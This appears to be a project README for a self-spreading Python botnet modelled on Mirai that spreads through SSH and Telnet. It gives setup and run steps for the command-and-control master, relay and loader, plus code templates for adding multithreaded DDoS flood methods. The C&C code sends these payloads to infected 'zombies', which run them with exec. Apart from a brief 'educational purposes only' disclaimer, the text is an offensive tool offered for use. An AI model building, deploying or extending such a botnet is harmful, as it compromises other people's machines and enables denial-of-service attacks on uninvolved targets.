Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol.
Modern script fullly written in python3.
- This project was made for educational purposes only! I take no responsibility for anything you do with this program.
- If you have any suggestions, problems, open a problem (if it is an error, you must be sure to look if you can solve it with Google!)
- A Brain, yes skiddie, you need to use your brain, but d'ont worry because Google is your best friend !
- A MongoDB account, you must create an cluster with database, show tutorial.
- A Ngrok account, (save your api-key)
- 3 Open port. Default: 8080, 1337, 667
- VPS with Debian based distribution.
- Time..
- Change the permissions of the scripts with the chmod command.
chmod +x ./script/*.sh
- Run installation script.
./Install.sh
- Start C&C Master server.
./RunMaster.sh
- Start Relay server.
- Note: If you have more than one VPS, you can run relay on other server.
./RunMaster.sh
- When you have enough new bots, you can expand your network by starting the loader.
./Loader.sh
If you whant to share your methods, just create pull requests <3
- Create your method with the template (#1)
- You need to add your method in class
Zombie
(cnc.py / #2) - If you whant to add module (no pypi) you need to follow #3 in zombie.py
- #1:
import socket, threading, time
__THREAD_NUMBER__ = 500
def method_name(ip: str, port: str, timeout: str):
def flood(ip: str, port: int, timeout: int):
start_time = int(time.time())
while int(time.time()) - start_time < timeout:
# write method code here
# Exemple: https://github.com/Its-Vichy/HBot/blob/main/src/payload/http_flood.py
for _ in range(int(__THREAD_NUMBER__)):
threading.Thread(target= flood, args=(ip, int(port), int(timeout))).start()
method_name('!ip!', '!port!', '!time!')
- #2:
def ddos_payload(self, ip: str, port: str, timeout: str, type: str):
if type == 'http':
payload = self.parse_method('./payload/http_flood.py', ip, port, timeout)
if type == 'your method name without space lmao':
payload = self.parse_method('./payload/your_method_file.py', ip, port, timeout)
self.send(f'run|{payload}')
- #3
# Just look for this line
# add: 'module_name': module_name
# Ex: 'random': random
threading.Thread(target= exec, args=(payload, {'threading': threading, 'socket': socket, 'time': time, 'module_name': module_name})).start()
- Loader: soon..
- Relay: soon..
- C&C: soon..
โ ๏ธ If this repository was empty, its because the project stay in developpement.- Thanks for looking at this repository, if you like to press the โญ button!
- Made with ๐ by Vichy.
- RCฮ Love u.